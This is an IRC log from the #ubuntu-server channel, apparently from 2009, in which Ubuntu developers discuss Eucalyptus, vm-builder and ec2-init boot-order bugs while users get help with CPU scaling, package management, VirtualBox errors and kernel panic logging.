<ttx> soren: I'm still on 1.6~bzr746-0ubuntu4
<ttx> but I can try that.
<soren> I am too. I'm upgrading in a few minutes.
<ttx> soren: no change.
<ttx> dpkg -L euca2ools
<ttx> oops
<soren> :(
<ttx> hmmm
<ttx> soren: I made it work by fiddling with TZ as well, let me narrow that down
<ttx> yes, choosing UTC as the TZ and rsetarting eucalyptus-cloud works around it
<oversize> Is it possible to alter the location of the images in libvirtxml.tmpl like this: <source file='/var/libvirt/domains/$hostname/$disk.filename' /> !? and then pass that template to vmbuilder? I am asking cause its not working, and i dont know if i just dont understand, or if it just wont work at all :) thx
<soren> oversize: How is it not working?
<ttx> soren: anything <= UTC works. UTC+1 fails
<soren> oversize: You can change anything in the templates. That's the whole idea.
<soren> ttx: Fantastic.
<ttx> soren: hm. wait, it seems a little less predictable now.
<soren> Even fantasticer.
<ttx> GMT-2 fails :)
<oversize> the images get created in the current dir where i issued the command.  i have set templates in /etc/vmbuilder.cfg to a path where my modified libvirtxml.tmpl resides. And this has the pasted <source xx >
<soren> ttx: Oh. euca-run-instances... errr... did not fail the way it used to.
<soren> $ euca-run-instances emi-67941325
<soren> RESERVATION	None	None
<ttx> ah-ah.
<soren> Oh!
<soren> hah, seems to be configuration problem.
<soren> com.eucalyptus.util.EucalyptusCloudException: image too large [size=10240MB] for instance type m1.small [disk=2048MB]
<ttx> forget what I just said about GMT-2. It's something else
<ttx> so it seems predictable (and an understandable bug)
<oversize> oh ... think i got it. did not modified the path in libvirtxml_fsimage.tmpl ... but why the both files? is there some doc on this template thing? i have only found https://help.ubuntu.com/community/JeOSVMBuilder
<soren> oversize: There's different templates depending on the type of image you're building.
<soren> oversize: If you're building Xen images, you should fiddle with libvirtxml_fsimage.tmpl
<oversize> ok, i am building kvm images:  vmbuilder kvm ubuntu ....
<soren> then libvirtxml_fsimage.tmpl shouldn't be relevant.
<soren> ttx: Odd.
<soren> ttx: com.eucalyptus.util.EucalyptusCloudException: Not enough resources: vm instances.
<ttx> soren: but the client comm seems alright now
<soren> Something's screwy here, that's for sure.
 * soren reboots the thing
<oversize> do i have to have the libvirt/libvirtxml.tmpl structure under the path specified with templates= ?
<soren> Yes.
<soren> oversize: You give vmbuilder an entirely new set of templates to play with.
 * soren takes a good, long break
<oversize> ok explains alot :D
<oversize> thx
<uvirtbot> New bug: #434019 in postfix (main) "Sync postfix 2.6.5-3 (main) from Debian unstable (main)" [Wishlist,Confirmed] https://launchpad.net/bugs/434019
<aubre> I upraded my karmic this morning and now when I do aeuca-describe-availability-zones verbose all I see is AVAILABILITYZONE,  the name of the cluster, and 127.0.0.1 . When I try to run an instance I get this :RESERVATION	None	None. Using the web interface I can see the page where I can modify the characteristics of the types of instances.
<aubre> and I have rebooted both my front end and my node controller
<zul> hmmm...45,000 iteriations i think that bug is fixed
<XiXaQ> I am trying desperately to get my cpufreq scaling_governor to permanently use "performanc", but I'm unable to. I've added "/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor=performance" (and cpu1) in both /etc/sysctl.conf and /etc/sysfs.conf. I've also added "echo 'performance' > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor" to /etc/rc.local.
<XiXaQ> when I reboot, it's set to "performance", but then after a while, it's back on "ondemand". Can someone please help me figure this out? It's crashing all my services, so it's very, very important to me.
<XiXaQ> can I add an inotify to /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor and overwrite any changes?
<XiXaQ> that would be a very bad solution as well, but it's better than having to pull the virtual powercord on all my kvm guests once a day.
<ttx> soren: is the cloud installer supposed to autoregister the cluster and walrus with the cloud controller ?
<soren> ttx: That's the idea, yes.
<ttx> soren: because I don't think it did, in my recent install.
<soren> ttx: Shame. I /may/ have messed something up in the merge. There was a /lot/ of conflicts in that init script.
<ttx> soren: i'll retry that.
<kinnaz> should come and help you guys with this eucalypt testing
<kinnaz> seems nice thing to mess with
<soren> ttx: I'm calling it an afternoon. I'll be around this evening if anything pops up.
<ttx> soren: ok
<vxnick> hi all - is 64bit MySQL stable enough on Ubuntu 9.04?
<XiXaQ> 9.04 is so unstable here, it's completely useless. I have an uptime record of 26 hours for my kvm guests here.
<_ruben> XiXaQ: tried disabling cpu scaling in the bios?
<XiXaQ> of course.
<XiXaQ> seems to be a script in ubuntu to bypass the proper configuration files from time to time, but nobody seems to know anything about it.
<_ruben> then again, i've only experienced the opposite (in a way): ondemand not throttling down my cpu
<XiXaQ> right. I've heard people complaining about that as well, on desktops.
<_ruben> was a desktop machine used as server, yes :)
<XiXaQ> but that doesn't cause all of their systems to stop functioning.
<giovani> XiXaQ: heh, there can't be a mysterious script
<giovani> either there's a daemon running
<giovani> or there's something in cron
<giovani> look at both
<XiXaQ> I have. I can't find anything.
<_ruben> any related tools/daemons installed at all? powersaved/powernowd/cpufrequtils/etc
<smoser> soren, are you planning on releasing a new vm-builder for karmic?
<XiXaQ> _ruben, I haven't installed any.
<smoser> i'm asking, because bug 427288 is marked as 'fix commited' for vm-builder/karmic, but its not commited anywhere there.
<uvirtbot> Launchpad bug 427288 in vm-builder "Karmic i386 EC2 kernel emulating unsupported memory accesses" [High,Fix committed] https://launchpad.net/bugs/427288
<smoser> (only in vm-builder trunk)
<XiXaQ> _ruben, well, I installed cpufreq-set.
<XiXaQ> _ruben, that's cpufrequtils...
<XiXaQ> _ruben, but I installed that because of the problems, so that's not the cause.
<XiXaQ> giovani, "both"?
<kaushal> ttx: hi
<XiXaQ> kondemand, of course, it must be that one.
<giovani> XiXaQ: both running deamons, and cron jobs
<slicslak_> i was running sudo aptitude safe-upgrade over ssh and foolishly forgot to use screen first.  the connection is lost, I was at the step where it was asking confirmation to overwrite config files.  Can I resume?  i am no longer using services for production, so i don't care particularily about /etc/ config files.  could i just reboot?  is it far enough along in the upgrade process?
<soren> smoser: Yes, I expect to upload a new vm-builder today, actually.
<smoser> ok. good.
<smoser> we'll definitely need another rev, ideally before beta
<soren> Today.
<soren> :)
<oversize> soren: the $disk thing in libvirtxml.tmpl is actually a Disk() from disk.py?
<smoser> soren, i meant another after today.
<smoser> as I'd like to see bugs 423497, 431103, 429169, 429106 fixed.
<uvirtbot> Launchpad bug 423497 in vm-builder "Sudoers file is misconfigured in AMI ami-5059be39" [Medium,Confirmed] https://launchpad.net/bugs/423497
<uvirtbot> Launchpad bug 431103 in ec2-init "ssh host key fingerprint no longer available in the console log" [High,Triaged] https://launchpad.net/bugs/431103
<uvirtbot> Launchpad bug 429169 in vm-builder "ec2: Include kernel modules in AMIs" [Medium,Triaged] https://launchpad.net/bugs/429169
<uvirtbot> Launchpad bug 429106 in vm-builder "kernel and initramfs should be available for uec" [Medium,New] https://launchpad.net/bugs/429106
 * zul goes for lunch
<kaushal> ttx: checking in again you around ?
<ttx> kaushal: yes
<kaushal> ttx: did you had a chance to look at that issue ?
<ttx> kaushal: no, and there is little chance that I will, at least until Karmic BetaFreeze
<kaushal> Bug 433906
<uvirtbot> Launchpad bug 433906 in tomcat5.5 "init.d scripts doesnot stop tomcat (5.5.25-5ubuntu1.1) on Ubuntu Hardy 8.04 " [Undecided,New] https://launchpad.net/bugs/433906
<ttx> that said, now that the bug is filed anyone else will be able to have a look
<kaushal> sure
<XiXaQ> I think I figured it out: /etc/init.d/ondemand sets the scaling_governor to "ondemand", no matter what you've configured. It's hardcoded... What a strange thing to do.
<uvirtbot> New bug: #418831 in gwt (main) "MIR gwt" [Undecided,Fix released] https://launchpad.net/bugs/418831
<XiXaQ> it's even documented: # Short-Description: Set the CPU Frequency Scaling governor to "ondemand"
<uvirtbot> New bug: #417212 in tomcat6 (main) "package tomcat6 6.0.18-0ubuntu6.1 failed to install/upgrade: subprocess post-installation script returned error exit status 1" [Low,Incomplete] https://launchpad.net/bugs/417212
<till_> hey -- i was wondering who i could talk to about: https://bugs.launchpad.net/ubuntu/+source/php5/+bug/420639
<uvirtbot> Launchpad bug 420639 in php5 "php-pear package problems (Karmic)" [Undecided,Incomplete]
<zul> till_, yes?
<domas> hi!
<domas> how does one run a server without having linux-image-debug packages? :)
<till_> zul: i was wondering what needs to be done so it would be fixed in karmic :)
<zul> till_: me finding some time this week and actually doing it
<smoser> soren, what do you think about bug 431255
<uvirtbot> Launchpad bug 431255 in ec2-init "ec2-init: Move ec2-run-user-data to startup priority S99" [Undecided,Confirmed] https://launchpad.net/bugs/431255
<till_> zul: can i bribe you? ;)
<till_> or well, whatever i could do to help
<zul> till_: no bribes are needed
<till_> zul: that's awesome
<jpds> jdstrand: Re: #433316 - apport is running.
<jdstrand> jpds: not sure why that isn't working then, but can you provide the other info in the bug?
<jdstrand> s/info/info requested/
<jpds> jdstrand: Just have. :)
<jdstrand> jpds: fyi, this should be in #ubuntu-devel (it isn't server related)
<Hypnoz> has anyone been able to pxe boot jaunty livecd or any other livecd?
<blistov> bens@karmic-cc:~$ ec2-run-instances emi-39CA160B -n2
<blistov> FinishedVerify: Not enough resources: vm instances.
<blistov> what's this mean?
<SyL> it means what it says, you don't have enough resources.
<blistov> vm instances though?
<SyL> if you do have enough resources, then I'm guessing the configuration is not working
<blistov> Does eucalyptus not have any way of reporting WHICH resources I've not enough of?
<SyL> euca-describe-availability-zones
<blistov> bens@karmic-cc:~$ euca-describe-availability-zones
<blistov> AVAILABILITYZONE        iamacluster     127.0.0.1
<SyL> if you run that, it tells you what resources you have availible
<blistov> Is this telling me I have ... no resources?
<SyL> yes...
<blistov> ...
<blistov> What have I missed?
<SyL> you would normally see 0/2 CPUs etc.
<baffle> soren: Did you ever get any further with Cobbler/Ubuntu? I see you set up the page in 2008. :)  https://wiki.ubuntu.com/CobblerSpec
<agussman> Quick question: When doing apt-get install, how do I specify a particular entry from my sources.list file for retrieving the package?
<agussman> I'm running into a problem where "the same" package is available in different repositories and it's downloading the wrong one
<agussman> I guess I could just reorder sources.list, but that seems like cheating
<blistov> SyL: I've added a node to my cluster.  Is there something else that needs to be done to make it usable by the cluster?
<sub> agussman: You could look into "apt pinning" (google that) or apt-get install package-name=version.number
<sub> Oh for that I'd say try apt pinning
<sub> Otherwise you can grab the package manually from the repo you want and install it using dpkg
<agussman> sub: Thanks for the info, I'll google them
<Hypnoz> When i /etc/init.d/networking restart, one of my interfaces doesn't come up, But if i do #ifup eth1 it does. Anyone know if there's a log file I can look into to get some more info?
<sub> Hypnoz: Check /etc/network/interfaces for a line similar to "auto <iface>" where <iface> is the name of the interface that isn't coming up on its own
<Hypnoz> http://pastebin.com/m22538205
<acalvo> how can I reinstall apache2 and its config files (to have the default behavior) -- or uninstall completely apache2
<Hypnoz> eth1 is the one that isn't coming up right
<Hypnoz> apt-get remove --purge apache2
<Hypnoz> remove only leave the config files, --purge cleans config files
<acalvo> may I remove the directories too?
<blistov> euca_conf --delete-nodes "node1"      does not work.  syntax is apparently incorrect.
<blistov> anyone know the correct syntax?  (--help says euca_conf --delete-nodes "host")
<Hypnoz> acalvo:  apparently apt-get purge <packagename> is the same. And I think doing that should remove the directories automatically
<acalvo> well, it does not
<acalvo> I've done it and I've already have it
<acalvo> I guess is for all the libapache* packages that are installed
<smoser> can someone please verify... i'm needing to fill out MIR for ec2-init (https://wiki.ubuntu.com/MainInclusionEc2-Init) . do i need to fill out MIR for its dependencies ?  do those MIR also need bugs ?
<smoser> fyi, its non-main dependencies are python-boto, python-cheetah, python-configobj
<m0ej0e> Anyone here know how to activate USB support on 8.04 LTS?
<hexa> it is active by default?
<KillMeNow> check your BIOS and make sure that USB support is turned on
<hexa> ah wait nvm
<KillMeNow> otherwise, what are you trying to do with USB?  just extra storage ?
<KillMeNow> is it a virtualbox?
<m0ej0e> It is Virtualboxed with "Virtualbox" and I need to activate it for extra storage.
<mathiaz> smoser: yes - you need to write MIR for the universe dependencies
<Pici> m0ej0e: The ose version of Virtualbox in the repositories does not support USB.  You'd need to grab the non-free version from sun/vbox's website to get that.
<m0ej0e> Sorry I am very new so If I say something a bit iffy like "Virtualboxed" it is because I don't know a proper term. Sorry for that.
<Pici> m0ej0e: And 'non-free' just means that its not open source, its still free to download.
<KillMeNow> try this out:  http://www.lostechies.com/blogs/jason_meridth/archive/2008/04/27/using-the-gutsy-gibbon-ubuntu-7-10-non-ose-version-of-virtualbox-with-your-hardy-heron-ubuntu-8-04-install.aspx
<till_> zul: hey, re: your email, what do you "mean"? :)
<smoser> thanks mathiaz
<zul> till_: can you split the bug report into two please?
<zul> mathiaz: puppet has been seeded
<till_> zul: ah, i can try :P
<zul> smoser: yes you do
<mathiaz> zul: great - have all the universe dependencies been promoted as well?
<smoser> such fun. 6 MIR
<zul> mathiaz: I believe so
<till_> zul: is there a function, or should i just open another one and link to it?
 * till_ is a first timer on launchpad
<zul> till_: yes
<smoser> zul, mathiaz i'd appreciate your comments in the ec2-init MIR linked to above
<till_> ?
<till_> =)
<zul> till_: you would be opening two bugs one for the dangling symlink and one for the php...actually Ill do it myself
<till_> sorry, i didn't exactly know what you needed.
<zul> till_: no problem
<zul> smoser: you dont need the build dependency stuff in the rationale
<smoser> its in the template.
<smoser> oh.
<smoser> i see.
<zul> its a formatting error i think
<smoser> i'm not asking for promotion because its a build dependency
<smoser> thats what it is for
<zul> k
<zul> smoser: I think the first part is good enough
<vxnick> is there a quicker way to erase data from LVM during the install process?
<giovani> vxnick: what do you mean, exactly? erase data from LVM?
<vxnick> giovani: I'm deleting some old partitions which are LVM in order to install on to this HDD
<vxnick> giovani: this is in the installer
<giovani> ok
<vxnick> it's only a 250GB drive, but taking absolutely ages to delete - says it's going to write random data to, which I don't really need in this case
<m0ej0e> Pici Would it be ok if I PM you for some more information?
<Pici> m0ej0e: You can, but I'm not sure I'll be able to help.
<giovani> vxnick: well that's separate from deletion
<giovani> vxnick: there may have been an option in the installer to not do a full wipe (there should be)
<vxnick> giovani: I'll have a look, thanks for your help
<vxnick> standard installer or advanced?
<giovani> both should have an option to not do a full wipe
<vxnick> gotcha, thanks
<giovani> there's virtually no reason to do a wipe on a personal machine just because you're reinstalling -- in a business environment, or before you discard a drive, wiping is a very good idea
<Belloto> hi ... I have a 8.04 ubuntu server and I mounted a windows shared folder using smbmount //192.168.1.5/shared /mnt/winfolder -o username=Belloto
<soren> smoser: I don't think it's generally a very good idea to adopt other people's hysterical raisins. Just because Eric put it some arbitrary place doesn't mean that we have to.
<soren> smoser: S71 might be a great place. I just want to choose it because it's a great place, not because "that's what Eric did".
<Belloto> then I enter sudo password and user password, and I got it running properly ... but later I use to get "CIFS VFS: No response for cmd ..." errors when some programs try to access files at /mnt/winfolder
<soren> smoser: An argument could be made for S99, since that's where rc.local runs, which has a bit of the same feel to it as the user-data script.
<Belloto> so, I can browse files but for some reason samba is not running properly
<smoser> i think it reasonable to have it run very late.  although, as I've stated, i think it should run very early
<soren> smoser: Heheh :)
<Belloto> any clues?
<smoser> personally, i think the user should have the option to run things in the initrd
<m0ej0e> Server 8.04 LTS need help getting USB devices running. OS sees a printer, but not a USB flash drive.
<soren> smoser: Fascinating proposition.
<smoser> but for now, that is not acheivalbe in karmic
<soren> smoser: Right.
<smoser> soren, fwiw, i have a "debug initrd" (currently only i can launch it) that allows hooks from the root filesystem.  its good for debugging.
<m0ej0e> ls
<soren> smoser: I can imagine :)
<smoser> do you think there is much potential for regression by moving the init script to run later ?
<soren> m0ej0e: file not found
<soren> smoser: Yes.
<soren> smoser: Do I care? I'm not sur.e
<smoser> well, your comments would be appreciated in that bug
<soren> smoser: Well, "much" is a strong word.
<soren> smoser: sure, sure, I'm just rambling a bit here first :)
<m0ej0e> soren: What do you mean?
<soren> m0ej0e: It was an attempt at a joke. (as a response to your "ls")
<soren> smoser: do you happen to have an instance running right now?
<m0ej0e> soren: Oh lol. I require more coffee it seems.
<smoser> soren, MIR requests "Who is the package bug contact in Ubuntu?"
<smoser> what would the answer be to that for a.) ec2-init b.) euca2ools.  c.) where do i find that generally?
<smoser> soren, i do not. i've tried to be mroe careful as I have a bout 5 day worth of un-used amazon ec2 instances this month :)
<soren> smoser: You're generally expected to know things like that when you're writing the MIR. ec2-init would be me (and you, probably). euca2ools would probably also be you and I, and hopefully upstream.
<soren> smoser: Yeah, I accidentally left 9 running when I left St. Louis. Didn't turn them off until 3-4 days later. Doh.
<soren> smoser: Launchpad will show you the bug contacts, though.
<soren> smoser: Gimme a sec.
<smoser> soren, i was wondering if that was more a question of "what developers get bugs eamiled to them for this package"
<smoser> yeah, thats what i meant.
<soren> smoser: https://edge.launchpad.net/ubuntu/+source/ec2-init
<soren> smoser: Fourth box from the top in the right column.
<smoser> and soren, if you want to do the MIR since you're more knowledgeable, feel free to take over ;-)
<smoser> thanks
 * soren whistles innocently and looks the other way
<soren> smoser: For our images, S71 and S99 makes virtually no difference. http://pastebin.com/m6085f7f7
<danage> anyone here working on home folder encryption? i have a serious bug to report but dunno how to fetch the necessary information and which pakage to attach it to (sorry for cross posting)
<smoser> soren, do you know when apache runs ?
<smoser> never mind.
<soren> danage: It's much easier to just ask your question that to ask for someone who knows the answer to a question that has not yet been asked.
<smoser> i'm thinking that it makes sense to run user data before likely-configured-by-user-data services ran
<smoser> (and that, i thought, apache)
<smoser> but who knows.
<soren> smoser: I was thinking the same thing.
<soren> smoser: The slight twist is that -- with our images -- the user-data script will by definition run before these services, because it's going to be the user-data script that installs them.
<smoser> thats why i think the first hook is initrd. then, you run before everything....
<smoser> soren, well, yes. that is true.
<soren> danage: In other words: Just ask your question. If someone knows the answer, they'll respond.
<smoser> thats actually very interesting though
<danage> ok so here is the thing: i installed karmic alpha with home folder encryption. after an update (about a week or so), the system hangs at boot - it cannot load some encryption component. the system is unusuable and halts at a console.
<smoser> it means that the earlier the user-data runs the higher likelyhood there is of doing an 'apt-get install server-that-shouldnt-run-till-later'
<danage> i want to report that on launchpad, but a) what package and b) how do i extract the console output
<soren> danage: Ok. File a bug against something ecrypts-like. If that's not where it belongs, whoever looks at it will know better where to file it and will take it from there.
<soren> danage: Sorry, ecryptfs-like. I type quite porrly today.
<soren> Err... poorly.
<soren> Case in point.
<danage> ok thanks soren, n/p i got the idea :)
<soren> danage: As for the console output, take a photo.
<soren> danage: Digital camera, camera phone... Whatever.
<danage> soren: meh i feel stupid now, shoulda figured....
<soren> danage: Oh, don't.
<soren> danage: Virtually noone thinks of that. :)
<soren> smoser: Oh.. hm... very interesting point.
<soren> smoser: Ok, AFAICS, there's around 3 places we can put this: a) As soon as network (actually the meta-data service) is available, or b) S71-ish or c) S99-ish.
<soren> smoser: (Interrupt as soon as there's something you disagree with)
<soren> smoser: Benefits of c) (and to a lesser extent b)): You're reasonably sure that any dependency on other services will be fulfilled.
<smoser> i would say there is the ability to do it before a.) though (requiring manual bringup of network device)
<soren> right.
<smoser> but i agree otherwise.
<soren> I don't think it's practical at this point, really, but ok, sure, let's add that option as well for completeness.
<soren> Are there other benefits?
<soren> (of S99-ish run time)
<soren> It matches rc.local.
<soren> ...which is also place for local customisations of sorts.
<soren> Downside: Changing configuration of services(*) takes longer since it will often require restarts that would otherwise have been avoided.
<smoser> right.
<soren> (*): This only really applies to SSH for our images, though, since that's the only service running in the images.
<smoser> and means a severe security hole in said service cannot be completely plugged by a user-data script
<soren> Same disclaimer applies.
<soren> But yes, also a good point.
<soren> Hm... Similarly, if you want to mount an EBS volume for storing your database or whatnot, it will require stopping services, perhaps moving files around, and mounting the volume, and starting the service again.
<soren> It's very similar to the configuration issue, but slightly different.
<smoser> i really think that at this point in cleverness of user data scripts, the best solution is probably rc.local time.
<soren> At least different in the way that ec2-init has (rudimentary) support for reading EBS volume descriptions from the user-data field and makeing use of that much earlier in the process. If that were to become widespread, this difference becomes significant.
<smoser> but, as you pointed out, the difference between that and S71 is small to none
<soren> smoser: In our images, yes.
<soren> smoser: If people have pre-bundled images with a bunch of services (a lot of which run at S90-ish or later), I'd say we want to go before that.
<aubre> In 1.6, after I upgraded the version of eucalyptus on both my front-end and my node controller, when I do $euca-describe-availability-zones verbose  I get AVAILABILITYZONE	clustername	127.0.0.1 when I expect to also see the types of instances I can run. When I try to do a
<aubre> euca-run-instances emi-xxxxxxxx -k key I getRESERVATION	None	None
<danage> ok behold, here is my bug report: https://bugs.launchpad.net/ecryptfs/+bug/434238
<uvirtbot> Launchpad bug 434238 in ecryptfs "[karmic] home folder encryption broken after recent update" [Undecided,New]
<aubre> I then try euca-describe-instances and nothing is returned.
<smoser> soren, i dont know. i think its really arguing about things we dont' know a lot about.
<soren> aubre: I don't think this channel has developed sufficient proficiency with Eucalyptus to generally be the best place to ask these questions, I'm afraid. I recommend #eucalyptus. Some of also hang out there. :)
<aubre> soren oh ok sorry.
<smoser> so if we have ec2-init running early, and user data running later, we'll have to have another init script, correct?
<soren> smoser: all the more reason to research, analyse, and discuss rather than "just doing whatever someone else has done for a while, which seems to have been a completely horrible decision". :)
<soren> Err..
<soren> Seems to have NOT been a completely horrible decision :)
<soren> smoser: Either that or some kind of conditional based on $0. I don't think that's worth it, though.
<aubre> I'm happy I can package images, before when I tried to do it in 1.52 it kept invalidating my kernel.
<soren> aubre: Oh, don't apologise. I understand why you ask here, and you really should be able to, but I just think -- at this point -- you'll be better helped in #eucalyptus.
<aubre> soren: gotcha. I asked them, and I've done a bug report.
<smoser> soren, i think i would prefer 2 init scripts.  ec2-init and ec2-user-data.  the first pulling the user data and writing it to a location that the second would consume.  since the first is already hitting the metadata service i'd like to alleviate the second from doing so. of course the second somehow has to get its "my-ami" for run-once-per-ami
<aubre> soren: I just need to be a little more patient :)
<soren> smoser: We should totally cache that as well.
<smoser> soren agreed. i'm just hesitant in any changes at this point.
<soren> smoser: Good man :)
<smoser> because we keep regressing
<soren> smoser: Perfectly fine. We'll make a note of it and make it happen for Lucid.
<m0ej0e> How do you disable the floppy drive for the server?
<soren> m0ej0e: You... have... a floppy drive?
<giovani> m0ej0e: define "disable"?
<zul> man after my own heart
<jart> is it possible to put "HZ=1000" as a boot option in my grub config?
<aubre> m0ej0e: have you tried disabling the floppy drive controller in the bios? or you could always disconnect the cable
<aubre> m0ej0e: if you disable the floppy controller in the bios it shouldn't be detected when you boot the system
<m0ej0e> I am running the server in virtualbox. Within Virtualbox I have disabled the floppy drive, and no the computer does not even have one on it.
<giovani> m0ej0e: if you disabled it in virtualbox ... then it's not there
<m0ej0e> Then why do I still get an i/0 error?
<m0ej0e> *I/O
<giovani> m0ej0e: because you haven't rebooted?
<giovani> you shouldn't disconnect hardware like that while the system is running
<giovani> it's not how-swappable
<m0ej0e> giovani: I have rebooted.
<uvirtbot> New bug: #434036 in eucalyptus "euca-describe-availability-zones verbose doesn't report the types of instances available" [Undecided,New] https://launchpad.net/bugs/434036
<uvirtbot> New bug: #434043 in eucalyptus "euca-run-instances emi-xxxxxxxx -k key doesn't start an instance" [Undecided,New] https://launchpad.net/bugs/434043
<drgonz> hey guys, just wanted to try and ask you guys for some help
<addisonj_> grrr... i just started a new job, last sys admin did everything with arch linux...
<drgonz> I just finished compiling a 2.6.30.7 kernel for a 8.04 LTS server in virtualbox, and I have a "end_request: I/O error, dev fd0, sector 0" and "o	SMBus base address uninitialized â upgrade BIOS or use force_addr=0xaddr" any advice?
<addisonj_> call my crazy, but arch does not seem the ideal choice for stability and reliability in an enterprise server situation, that could just be my
<giovani> drgonz: hahaha
<giovani> you are likely either m0ej0e, or a classmate of his
<giovani> since you just asked the same question
<drgonz> hahahaha
<giovani> and you both came from the same IP range
<drgonz> hes my roomate
<drgonz> hes standing right here too
<giovani> why not follow the advice you were given in the paste
<drgonz> what paste?
<drgonz> im not his rig
<giovani> "end_request: I/O error, dev fd0,  sector 0" and "oISMBus base address uninitialized â upgrade BIOS or use force_addr=0xaddr"
<drgonz> yah, tried that, thats y im here
<giovani> is the floppy device enabled in virtualbox?
<giovani> you tried what?
<drgonz> no, the floppy isnt enabled, and im tried to enter force_addr=0xaddr, but it does nothing
<giovani> enter where?
<drgonz> CLI
<giovani> sigh
<drgonz> so, u got any advice?
<drgonz> or anyone else? could use some help for this project
<drgonz> prof wants a no error boot
<addisonj_> don't use virtual box :P
<drgonz> lol
<drgonz> i wish it was that easy
<drgonz> ive tried google the errors, sifted through tonnes of pages, but no fixes, just the fact that its a problem
<SyL> drgonz: why do you need to use virtual box?
<drgonz> for the prof
<drgonz> we need it so we can work on it either at the lab or at home
<drgonz> or if he ants the image to check it
<drgonz> we don't have a common drive to store/retrieve our image
<soren> smoser: Hm... That vmbuilder upload will have to wait until tomorrow.
<soren> First thing.
<benc>  is there a tutorial on how to write init script for daemon?
<KillMeNow> http://www.cyberciti.biz/tips/linux-write-sys-v-init-script-to-start-stop-service.html
<KillMeNow> all kinds of tutorials
#ubuntu-server 2009-09-22
<benc> thanks
<KillMeNow> Xinu!
<xinu> KillMeNow: hey boss, what it is?
<KillMeNow> trying to not take a nap while at work
<KillMeNow> at least not for a little bit
<KillMeNow> LOL
<xinu> KillMeNow: that's the way to be
<CppIsWeird> i have ubuntu on 3 different machines with openssl server. how come on some the login responds instantly and some it pauses for about 15 seconds before asking for the password?
<mushroomblue> system load.
<mushroomblue> in my case, my router was being used for an SSH man-in-the-middle attack
<CppIsWeird> nah, its not system load
<CppIsWeird> im not saying it cant be, but that it is not the case for me.
<CppIsWeird> and it is consistent, one machine is immidate, the other two are not. all upgraded to the latest packages.
<erichammond> smoser, soren: I happened to scan the logs and saw some discussion of bug 431255.
<uvirtbot> Launchpad bug 431255 in ec2-init "ec2-init: Move ec2-run-user-data to startup priority S99" [Undecided,Confirmed] https://launchpad.net/bugs/431255
<smoser> soren is long since asleep
<smoser> but i'm here for a bit.
<smoser> i was really hoping that soren would summarize in the bug report
<erichammond> I agree that there isn't much difference between S71 and S99.  I don't think I had much of any particular reason for S71.
<erichammond> I probably copied somebody else's S70 for updating authorized_keys and then just went one higher.
<erichammond> I'm hoping that the last few comments in the discussion did not imply that this bug would not get fixed for Karmic.  What was your understanding there?
<smoser> i think the net was that we don't see a lot of reason for making this change now.  wanting to be able to log in and watch user data run isn't a huge deal in and of itself.
<smoser> i really dont want to regress
<smoser> i think thats where soren was standing
<smoser> i really just see a lot of things to get done, and dont want to regress anything
<erichammond> The problem is that it breaks code which is already running on images on EC2.  I would have to rewrite some of my code to get it to work on Canonical's images.
<erichammond> Nobody is running production code on Canonical's karmic images yet, so they should start out with the de facto standard, especially since everybody seems to agree that's the ultimate direction anyway.
<Jeeves_> CppIsWeird: Check your dns settings on the slow ones
<smoser> what would break?
<Jeeves_> see if they can resolve your hostname, and their own
<erichammond> smoser: Users drive the setup of an instance in a number of different ways.  One of my production use cases has the user-data script wait until an EBS volume is mounted, but the process which attaches the volume first has to do some stuff on the instance through ssh.  This deadlocks and both processes are waiting for each other.
<erichammond> (since ssh is not available until user-data completes)
<smoser> can you write that in the bug ?
<erichammond> Sure thing.
<erichammond> A simpler example might be: User does not want to put private keys in user-data, so user-data script waits until they show up on the file system.  External process scp's the keys in after starting the instance.
<zul> do do do
<ScottK> Interesting: http://www.channelregister.co.uk/2009/09/21/yahoo_shopping_zimbra/
<erichammond> zul: done done done (?)
<zul> i wish
<erichammond> smoser: Added comment to bug 431255.
<uvirtbot> Launchpad bug 431255 in ec2-init "ec2-init: Move ec2-run-user-data to startup priority S99" [Undecided,Confirmed] https://launchpad.net/bugs/431255
<erichammond> smoser, soren: I would be happy to do the work to split the ec2-init sh script using an approach which had the least chance of breaking anything, if my branch had a chance to be merged.  There would be duplication of 16 lines of code (run_once/run_once_per_ami) but that's about the only downside.
<Debolaz> Bah, damn server keeps locking up.
<Debolaz> What is the correct way to recover a kernel panic message after a reboot? (Or enable recovery of it the next time it happens)
<nick_schembri> Debolaz: I
<nick_schembri> Debolaz: It's been a long time since i needed to work at that level. I used a serial port to collect the msg and a core to debug.
<Debolaz> This is a remote server so I'm hoping to be able to get away with something more convinient than a serial port for the first debugging attempt. That being said, if it has to be done, it has to be done, but could the kernel be configured to relay this information over TCP or UDP instead?
<nick_schembri> yes ... let me look
<nick_schembri> Debolaz: lookup syslogd.
<nick_schembri> Debolaz: or logserver http://www.aboutdebian.com/syslog.htm
<twb> Will 10.04 switch to rsyslog, as Debian did in Lenny?
<twb> Plain syslog blows
<ScottK> twb: We have switched for 9.10.
<twb> ScottK: cool.
<twb> (I only track LTS, you see.0
<Debolaz> nick_schembri: How do I configure the kernel to log directly to this though? If the kernel is panicing, it's not going to return to userland, and hence the message won't be forwarded to the remote server by syslogd. The kernel has to do it directly itself.
<twb> Currently in 8.04 I send syslog UDP packets over an SSH -w TCP VPN, because it seemed like a better idea than installing a non-main category syslog :-(
<twb> The next iteration of my products will use a proper OpenVPN UDP VPN.
<nick_schembri> Debolaz: not sure. if the system is faulting before it can write to a file or send one udp packet, you are going to need to use a serial port to get as much as you can before it stops.
<Debolaz> nick_schembri: But it would still be able to send a network message out. The kernel has access to the NIC and network stack, just as it has access to the serial port. There's nothing technically preventing it from sending out a message. However, a panic does mean that userland is no longer a safe area, and it will never return to that place, making it technically impossible for syslog to send a message to a remote server.
<nick_schembri> Debolaz: will the system run for a time?
<nick_schembri> Debolaz: can you ping the system after it faults.
<Debolaz> No, there's no response at all from it.
<rpinto> Hi, im trying to install smokeping on my ubuntu server(8.04).. when i run apt-get install command, i get a PAM authentication error
<rpinto> here's the error:Your account has expired; please contact your system administrator chfn: PAM authentication failed adduser: `/usr/bin/chfn -f SmokePing daemon smokeping' returned error code 1. Exiting. dpkg: error processing smokeping (--configure):
<uvirtbot> New bug: #433863 in image-store-proxy (main) "image-store-proxy reports failure to start while it starts correctly" [Low,In progress] https://launchpad.net/bugs/433863
<psteyn> Hi guys.  I think I'm hitting an ext4 bug which has been fixed in 2.6.29.  However, my latest updates available take me to only 2.6.28
<psteyn> What is the proper way to use a later kernel in ubuntu server?
<psteyn> Using 9.04 x86
<psteyn> sorry 64bit.
